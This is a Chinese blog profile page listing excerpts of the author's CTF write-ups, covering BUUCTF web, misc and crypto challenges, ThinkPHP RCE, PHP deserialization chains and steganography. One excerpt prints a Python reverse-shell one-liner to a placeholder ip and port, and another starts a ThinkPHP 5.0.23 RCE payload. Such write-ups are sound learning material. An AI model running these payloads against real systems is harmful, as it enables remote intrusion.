自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Sk1y的博客

萌新从入门到摔门

  • 博客(17)
  • 收藏
  • 关注

原创 第三届第五空间网络安全大赛 Web复现

环境还没关,良心比赛方,赶紧趁着复现复现文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTPpklovecloud是个pop链,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php';class pkshow { function echo_name()

2021-09-24 23:01:40 1137 1

原创 ctfshow 2021 月饼杯 web

文章目录web签到web签到<?php//Author:H3h3QAQinclude "flag.php";highlight_file(__FILE__);error_reporting(0);if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "

2021-09-23 20:33:48 564

原创 [HFCTF2020]EasyLogin

知识点:nodejs,jwt文章目录解题过程参考链接解题过程打开题目是个登录窗口,需要注册账号,然后登录,登录之后,有个获取flag的按钮,但是不能够获取flag,因为permission denied。可以发现提示/static/js/app.js/** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */function login() { const username = $("#username").val();

2021-09-20 00:47:46 766

原创 buuctf Crypto 1--4

知识点:凯撒密码解题过程下载附件,加压之后,是个txt文件synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}凯撒密码凯撒密码在线工具位移13位之后得到flag

2021-09-18 17:14:30 183

原创 [羊城杯 2020]EasySer

知识点:pop链,写入木马,蚁剑连接

2021-09-18 17:13:49 478

原创 [网鼎杯 2020 白虎组]PicDown

读取源码,反弹shell

2021-09-16 21:01:29 513

原创 [V&N2020 公开赛]CHECKIN

知识点:文件读取,反弹shell解题过程payload:(ip,port自行修改)shell?c=python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin

2021-09-16 09:04:38 124

原创 [BJDCTF 2nd] old-hack

知识点:ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析解题过程打开环境提示是thinkphp5的漏洞,测试一下index.php?s=1,报错得到版本号:5.0.23,直接找payload:ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析http://858341d4-67a6-4c5c-9c02-44d7380d1346.node4.buuoj.cn:81/index.php?s=1POST传参:_method=__construct&filter[]

2021-09-15 22:20:51 980

原创 [BJDCTF 2nd]duangShell

反弹shell

2021-09-15 20:05:28 122

原创 JustSoSo复现

这个题目又碰到了,所以复现一下,过程中又学到了很多东西,记录记录题目环境2019国赛线上的一个题目JustSoSo,总共三个文件:index.php,hint.php,flag.php,贴一下源码index.php<html> <?php error_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"]; if(!isset($file)){ echo

2021-09-13 21:15:14 418

原创 BUUCTF Misc 20 easycap

解题过程流量包,wireshark打开,都是TCP的包,追踪tcp流

2021-09-10 23:36:24 240

原创 BUUCTF Misc 19 爱因斯坦

解题过程下载后,是个爱因斯坦的经典照片使用binwalk,分离出压缩包binwalk misc2.jpg dd if=misc2.jpg of=3.zip skip=68019 bs=1得到压缩包,爆破无果。查看图片的属性,在详细信息中,this_is_not_password输入即可得到flag...

2021-09-10 22:03:26 429

原创 BUUCTF Misc 18 小明的保险箱

binwalk分离压缩包,爆破密码解题过程附件是个图片,binwalk分离binwalk 4a81409d-f24b-4915-adc9-304e6faf60f2.jpg dd if=4a81409d-f24b-4915-adc9-304e6faf60f2.jpg of=2.zip skip=79903 bs=1得到压缩包,使用ARCHPR爆破口令,得到口令:7869打开即可得flag...

2021-09-10 21:15:53 342

原创 BUUCTF Misc 17 镜子里面的世界

17. 镜子里面的世界使用binwalk没啥发现然后使用Stegsolve,发现key,包上flag{}即可flag{st3g0_saurus_wr3cks}

2021-09-10 19:37:49 2213

原创 BUUCTF Misc 9-16

9. LSB 10. 文件中的秘密 11. wireshark 12. rar 13. qr 14. 伪加密 15. 被嗅探的流量 16. ningen

2021-09-10 19:21:04 186

原创 BUUCTF Misc 1-8

BUUCTF Misc 爆破,binwalk

2021-09-10 18:40:01 299

原创 [BJDCTF2020]EzPHP

知识点:creat_function代码注入,异或,require加伪协议,define()+fopen()+fgets(),换行绕过,sha()比较,正则匹配绕过等等

2021-09-02 00:44:57 324

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除